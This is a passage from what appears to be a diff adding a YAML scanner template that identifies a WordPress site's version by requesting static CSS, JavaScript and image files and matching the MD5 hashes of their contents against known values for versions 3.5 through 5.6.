- "(\"af0bff7c54e72b9cfb0980cce35939fe\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"f6a57bc44778998dd4f03246137c77ab\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/light/colors.min.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"4c299fa424111f5c08a1965011cec210\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"8793d3def979fb16292094f477cecc32\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"ef025447b62b0fb2dfda1cea9f94a0cf\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"7cb25e3697da8c991aafdff1746a2844\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"c64378da84783433e12a436eabb62f79\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"fcb5d20b06e3fd14e30ff9e923992c85\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"71d29edd099575774b911e59e06c12dd\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"e9458e7a35d7956a8d2cbfadb98b630c\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"a33dcc15411e093809cc2a644ef86023\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"8dc3381d0f8e3894c39dd12664c9da35\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"12887d90070563f1d8df477f35e141b3\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"cb875ea5329fb6ae3e3db356473adc84\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"f1c96c88b39f8f49af243220e8d3b9e4\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.33 + dsl: + - "(\"c3219e4d10fb9173b6943680fb1cef5c\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"0e0a26930fec17520735158ccffacf87\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"67759de92dd9a5b53387ecf2ff9823dc\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"9045e2d84b0efff56c02d3b7cbc5eed8\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"383d77279848f54af0aad27d03493c87\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"2e1fe03f5361c38fab42e0e53ad0d962\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/post.min.js" + matchers: + - type: dsl + name: 4.7 - 5.0.11 + dsl: + - "(\"ede5f7e8431dbeb790e8cf9665192171\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"2be11faf4eac3102801d149351155634\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"c992b68f5eeb27a0b9dea211084c67df\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"663170b582dd9b0d221e28bda521a7ee\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"2592d7b6de8cc11ebacf7b25cea135e0\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"c47dac85d54efe4352e7e5d6045970ab\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"269e1c1bcb01aeb3fad829be7ed4aacd\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"ab0efe0b053c1f256c1162bfacea56ce\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"62e4524aa815499b0051da2cadbf86d1\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"96e5a6b4448a8817566d3575925a9660\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"0b36f334be278c6b5bd7077f95315b69\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"9341ffcbbe31f030b5555739ddee103b\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"c6b980f0fd65f11fce68d0493c933f02\" == md5(body))" + - type: dsl + name: 3.5.1 - 3.5.2 + dsl: + - "(\"ce823a427058873c7251ce707aa717b2\" == md5(body))" + - type: dsl + name: 3.5 + dsl: + - "(\"1e251e3ba10b2a9d7f3f496cec3ba3df\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"23749291713af38bcd57fc67847b33ac\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.2 + dsl: + - "(\"a4f6d69eae837efe91c823a67bd6b51c\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"e80d95db0d7ee2b88c1a19e2e936033d\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"2ccb4e6d8db314a751d0f26ccb1f3050\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"1cf1102d0221653ce70fa97e66f19fa8\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"dc192b32b16ed7c12cf9e1814f3166e2\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"73cf1fc4bd46ddb72b5ab033c25d7151\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"41983d3c2afbd6dae6a6190bfb30b5ce\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/embed/block.json" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"012e35dbf37c9ffc5ea96cd1bc219658\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/jquery.min.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"b6f7093369a0e8b83703914ce731b13c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/accordion.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"b9b89ad1d4f4f85a17bdeadde861d7c2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-puff.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"8daa4348cc13d877079c64dfdcccd69e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-pulsate.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"aa2a0dd249e4cd953b748e971457bff5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/droppable.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"2fbff289eeb05f0a61fdeb47ee0197dd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/tooltip.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"ec26c23c51f5317d809ce60b99a09e96\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/datepicker.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"f2345031072cd99d8803607892acb5b5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/selectmenu.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"6f8d1878852065716483e58908d12449\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/tabs.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"182baf37339f6cbda563c950beb0c552\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/resizable.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"766bbc6d4f2c95e6ada56e33ad82e0a6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-scale.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"2ccaa13092d3065c4b34072798c274e4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/controlgroup.min.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"dbbe37c4356a29b0002117a9a63ab2f0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/dialog.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"c1e5b1accf5594a2751590cede7acc9c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-slide.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"e5b20c93619b648c827b1532d7b010d8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/checkboxradio.min.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"ca832f201f7fa588f233d58ec95cc4fd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-shake.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"fa3b35c9fb5f8a80ffb4d7e9c6bd22dc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"05be6adb42732a43a883e5b5f5781ff7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-clip.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"5d1c30325b579030563117c87f031551\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-transfer.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"4f1714d4a94ef3188d69e3f71cfed531\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-explode.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"918530b61da416ed692131af8e0b09f2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-bounce.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"c23b42a220e5d607475951fb6ef2dfb4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/autocomplete.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"103a644cfe2aefc145bd031d262a2105\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/slider.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"f5e2ab7dd0c055ebefebc6a4fd87afa2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/progressbar.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"4e1da4893d69f44492e95f7a799d0d33\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-highlight.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"6e2b29c208a7ef1d1eabcd49814c0db6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-fade.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"fa0f7273a34aafcf374f2cec0ce6ff11\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-size.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"613b6c8940a0edb59a7225b9dda20b5a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/draggable.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"13a2fc3a32af84670639d0744cb34489\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/checkboxradio.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"fe2256536412460abfa46ba086833a10\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/mouse.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"d9c1b4ebe4c4b269ea16f0c00db3dbe0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/selectable.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"2139db7166e7d24837ed7b422c9b7ad5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-drop.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"abc1b9e996b48a75298642ac81d131f7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/button.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"a61409f4e92ea9d81ec8b4fc66687e4f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/core.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"03185043abecf50db27be7746ba02278\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/menu.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"a9fb5616376707a2c1aea771b7caa410\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/controlgroup.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"2fd96d0e55bfd44b1a4e5017862a7b8d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/sortable.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"9f6b58c7f1f145079b454cdafb268d1c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-fold.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"cbc47d3a68f942fdd5af7d7a13fb78e9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/spinner.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"16e7fc3896c9545869dbf84dc1105984\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-blind.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"ab1dbcf4e37b35b6e60bc51e25816b6f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/reusable-blocks.min.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"5f15dd8e68615a0aa5ab147eb647af58\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/reusable-blocks.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"f57dc6819aaf2bc92ac6cea8849a2f98\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/freedoms.png" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"657f0dd12498195df04f7bf0a2f0fd84\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/privacy.png" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"c6d29f81dd98f505c70487d3bdd87d84\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/auth-app.min.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"8ec531b03666d9538c6b03cafde4cb02\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/auth-app.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"62cead99458abe76011dc34f6b077697\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/application-passwords.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"45f6def0488306f747ae93270b8c1a52\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/application-passwords.min.js" + matchers: + - type: dsl + name: 5.6 + dsl: + - "(\"d8279901647f008258e250f8dcfb5652\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/element.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"0767833ec2d557e2fb8cc7cce93d07fd\" == md5(body))" + - type: dsl + name: 5.0.2 - 5.0.11 + dsl: + - "(\"fe88f0268727624b18aad39156e0fcfa\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"67ecb40edbf9ac38971734f2362023c3\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"f27ed347732c01ecb68ec39a45bd8b19\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.4 + dsl: + - "(\"4281e59a1bbd522ae68bb353b3742372\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"1af0ec7121e09261bbaa00c76b892829\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"6d8871831cefb35ae2bd86d1ae855156\" == md5(body))" + - type: dsl + name: 5.3.5 - 5.3.6 + dsl: + - "(\"ff4416a2c0c709dc65eaf5362822ac47\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"be3b6997217abdf27c33dabfaf66044a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/element.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"cfaf798326a1f494c6593161d90faa41\" == md5(body))" + - type: dsl + name: 5.0.2 - 5.0.11 + dsl: + - "(\"058ac8898dad07d85527a9e2983620d5\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"9d3ed277333cb350bac911821d395dad\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"672ab7c0d147a163c03f81a015d1f235\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.4 + dsl: + - "(\"5a9a26812516f2b3cbf83f89de6142f3\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"49f99b4b03e933aa76efb3fa94633b78\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"89d496444690eac0f660412785f33bf3\" == md5(body))" + - type: dsl + name: 5.3.5 - 5.3.6 + dsl: + - "(\"ecb0cc9b0933db6ca8a0da36ea1b56ed\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"8e2a734b9b8a7e0fc63e086866c94e4c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/i18n.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"3762e49b94ff5c920b2134988f7e32dd\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"0ea52e8da6cb91f2af5a5a0505a318a2\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"f9bba0a9887d37c9a77856c92106c9e0\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.4 + dsl: + - "(\"34c000e943a288c66c0abb5d159c0b4b\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"e2d4275df035d483e9e9f3cddffbb8c5\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"a52a9c5c5045d8837247725f4dcfc1a4\" == md5(body))" + - type: dsl + name: 5.3.5 - 5.3.6 + dsl: + - "(\"542a206a36356b8c5f1e68c77e1d5ac5\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"09351928abfc3c611ded68553f891b14\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/list-reusable-blocks.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"9e5728386c1eaa1c6eb5a23eeb9ff0c8\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"af983ce033e97390b9c273b403e4e68a\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"d86708dfed8ae007dc9232534bfab807\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.4 + dsl: + - "(\"aa582350f107018b73961b3a99fda195\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"c1852be5984fd31a87311bca5b46a2b8\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"f5e7ea66cbc7773c765961a62f248c94\" == md5(body))" + - type: dsl + name: 5.3.5 - 5.3.6 + dsl: + - "(\"944c994d8f0f236431e888e635b9acbd\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"c521793f232f4d30a4ca13f4d1ffa118\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/a11y.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"8227a618a371014e3b3eb4c23607a25f\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"a65acec117c4a1fb5f4899bdff312101\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"1a379c26f6d2df6017d269402c6237d0\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.4 + dsl: + - "(\"6de67fd83bc890138ef16f2edcf72c7f\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"f6c9ab109fb2f780042c6d76f31c932c\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"458e5811b2646a6998945e8086da0dbe\" == md5(body))" + - type: dsl + name: 5.3.5 - 5.3.6 + dsl: + - "(\"5321c4e1c69f02d0b44438859a5ef257\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"00ec349ebc2a18936384a4820b49f29d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/i18n.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"53267e22d19e925551ff2f6eecb60c07\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"36f7bb8a849f3fa8e0887c87852af057\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"04879f14a95cd381ffe4198d685f9493\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.4 + dsl: + - "(\"88e1c5f8e0b6388d6f3c562c61523029\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"f00c40f7643bc657eb99fadcc63edb63\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"4d196dccc22591c69e5146e3c4d25a7e\" == md5(body))" + - type: dsl + name: 5.3.5 - 5.3.6 + dsl: + - "(\"11841368d799ad3d3a0eb29350272675\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"582c60610a05cb241219e36fc819828f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/list-reusable-blocks.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"4d9fa198a4229643fa7b513d81d16bd5\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"4e9716f165ab70db6f6aed5e5d0cf5cc\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"08b1277b8584f3a9b4da31de1f6b26eb\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.4 + dsl: + - "(\"221072737493c7bce035330aaac6fe4b\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"2d8d787282fe64ecffa60624501cef47\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"2736c416eb320581f85a98e39d473347\" == md5(body))" + - type: dsl + name: 5.3.5 - 5.3.6 + dsl: + - "(\"146d338a5e671762578541c6f26c3386\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"4b7dc7c7a72767069d5def4625240f07\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/a11y.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"cb439a67a2dbdefec09fec7b57ef64df\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"a7effde2a07e0cd212c26e2423cd7157\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"d95ae5d80773496840254ac17641e9b2\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.4 + dsl: + - "(\"8b973a699296092e4a14ee6c0ce90cbd\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"8e71effe9f05c722150d7e55d65bac7d\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"1f6917e48f6152db9b461733232240ee\" == md5(body))" + - type: dsl + name: 5.3.5 - 5.3.6 + dsl: + - "(\"f2a1bdcc4acf8cd53814ab777500838c\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"8c0772e68b1ada104fe3ae885d3a9fe4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/components/style-rtl.min.css" + matchers: + - type: dsl + name: 5.0 - 5.0.2 + dsl: + - "(\"09c39ec3f3e981006dc89fcbd719ec3e\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"c1b549e7ed316bf5a1d38d545923230e\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"0a420d9268a69cc187b3578bc2a7f8af\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"f77485415d0e8f8227b7b8d532c7080a\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"58a83301414521c957ebbd1e1962431d\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"c14fbc464761ecbc3f49c5416aabf658\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.1 + dsl: + - "(\"ff2e2dd6cbdd6cd849c3c6dd9e18d4ae\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"c8f2bae9a2da091777c345e132b151ec\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"610ffd816df7670a3483fc56a6f46e9d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/components/style-rtl.css" + matchers: + - type: dsl + name: 5.0 - 5.0.2 + dsl: + - "(\"5617ee3edf64f82ccf793554fdcc6dc0\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"23207926b6554158a37d95234a23414f\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"2c8cc2a3fc8fcec1e44eb8dbdfc96dc0\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"dffc8b4f8ef9b60d0ad4e21654b9969f\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"0edc3e519c5043a2cb9019ea92dcfdfb\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"110d7a6ca1609929fee74f3155516a00\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.1 + dsl: + - "(\"b3ee6a2f7296435db208f4de00d460f7\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"3e655c9c09378dfc1af4825ffe5d8297\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"5eb72aee24af648536d2c19d2f8abd74\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/components/style.css" + matchers: + - type: dsl + name: 5.0 - 5.0.2 + dsl: + - "(\"418b43fb785b1e323213ed7935295a1a\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"ceaf3c35802604ba2964561a5c15cafd\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"2600d32822603f50e0070a9e02e96cbb\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"ed45deda459cc27cd7b0b09037ce4154\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"90d3b8307d3d10eedac6ef17ade705d0\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"ca90f19f5f90739b10f7e5bb34daf8e8\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.1 + dsl: + - "(\"0981c860400ea6df276bdc7ba6ea7768\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"296cdbcc05ec6e76493b21ee95f94c45\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"dbccf2ded65bbf13ff78161a9789930d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/components/style.min.css" + matchers: + - type: dsl + name: 5.0 - 5.0.2 + dsl: + - "(\"db3e76f8a41f16d9e261a66b65b233dc\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"50242e6ba592897625683280e2cc183d\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"cb6ee69248476280b7e041e28bca75e6\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"8b8c3d03d4a83aca7779e61210443cfc\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"df32fa0a51fae2f512a26cce865dff85\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"41c395e5312889d5b6281119982b9021\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.1 + dsl: + - "(\"e5f31a8068c0da0c9cc09d60e3038d32\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"9ea8e47b2542b63e79e7933135d50adb\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"af4749ef59d8f6b2c738b5ec56c8104d\" == 